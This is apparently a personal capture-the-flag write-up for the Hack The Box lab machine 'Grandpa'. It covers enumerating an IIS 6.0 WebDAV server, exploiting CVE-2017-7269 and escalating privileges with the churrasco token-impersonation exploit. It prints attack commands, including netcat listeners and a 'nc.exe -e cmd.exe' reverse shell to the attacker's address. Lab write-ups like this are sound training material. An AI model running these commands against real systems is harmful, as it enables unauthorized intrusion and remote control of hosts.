# GRANDPA | 10.10.10.14

## Initial Enumeration

    nmap -v -T4 -sC -sV -oN nmap/initial 10.10.10.14

### Open Ports and Their Services

* 80 - HTTP - Microsoft IIS 6.0 - WebDAV

### OS Discovery

Since the server running is 6.0, that means the Windows version could be Windows Server 2003 or Windows XP Professional x64 edition.

## Service Enumeration

The default scripts in the nmap scan helpfully informed us that this server is a WebDAV server, because all I see upon navigating to the site is a generic error page:

![](img/port-80.png)

A searchsploit query digs up several potential avenues for exploitation.

![](img/searchsploit.png)

I grabbed the python-based buffer overflow from there, but it wasn't working. So I ended up searching the web for a [modified version](https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269/blob/master/iis6%20reverse%20shell) that already has a reverse shell payload in it.

## Exploitation

I set up a netcat listener to accept the incoming shell:

    rlwrap nc -nvlp 6969

Then I ran the exploit with the correct arguments:

    python buffshell.py 10.10.10.14 80 10.10.14.36 6969 

![](img/buffshell.png)

And I ended up with a shell:

![](img/shell.png)

## User Enumeration

I noticed that this user does not have access to the regular user's (Harry) home dir, so no flag for now. I will need to either pivot to Harry, or go right to SYSTEM.

This user has **SeImpersonatePrivilege**, so that could mean it is vulnerable to a Potato attack, though this machine is quite old so I'm not too sure about that.

![](img/privs.png)

I ran Windows Exploit Suggester after grabbing the systeminfo, and a lot of options were presented, most of them Metasploit-based.

I banged my head against the wall for a long time trying the non-MSF exploits out, and I had no luck. So I looked up some writeups for this box (I know...) and most people used Metasploit, which was discouraging.

But I found one writeup [here](https://0xdf.gitlab.io/2020/05/28/htb-grandpa.html) that focused on doing it the OSCP way, and I am eternally grateful. Not only was I having the same issues they did, but I also had additional problems figuring out a way to download things to the machine, given that `certutil` was not working.

It was this writeup that introduced me to the **churrasco** exploit, which is a precursor to Potato attacks, as well as to using an SMB server on my machine to serve up the files.

## Privilege Escalation

So, with 0xdf's help, I now had a way to transfer my files over.

First, I set up my smb share:

    smbserver.py -comment 'My Share' TMP .

Then, I transferred over the churrasco exploit and netcat:

    >copy \\10.10.14.36\TMP\nc.exe .
    >copy \\10.10.14.36\TMP\churrasco.exe chur.exe

Now, all that is left is to properly execute the exploit (as well as having a listener ready):

    .\chur.exe "C:\temp\nc.exe -e cmd.exe 10.10.14.36 9999"

And I had a shell, of the most unstable variety, which broke after a moment, every time.

![](img/root-shell.png)

So, technically, I owned the box, because I could keep reconnecting to read the flags. But it didn't feel good.

![](img/flags.png)

## Conclusion

Have to say I hated this box. It nearly forces you to use Metasploit, and if you choose not to, it's real annoying and cumbersome. But I suppose some machines in the real world would be just as inconvenient. This box frustrates me, and frustration is a killer in pentesting.

Steps:

* Exploit a buffer overflow vulnerability to gain a low priv service shell
* Use an ancient token impersonation exploit to escalate to SYSTEM, for a hot second
* Act like an elite hackerman
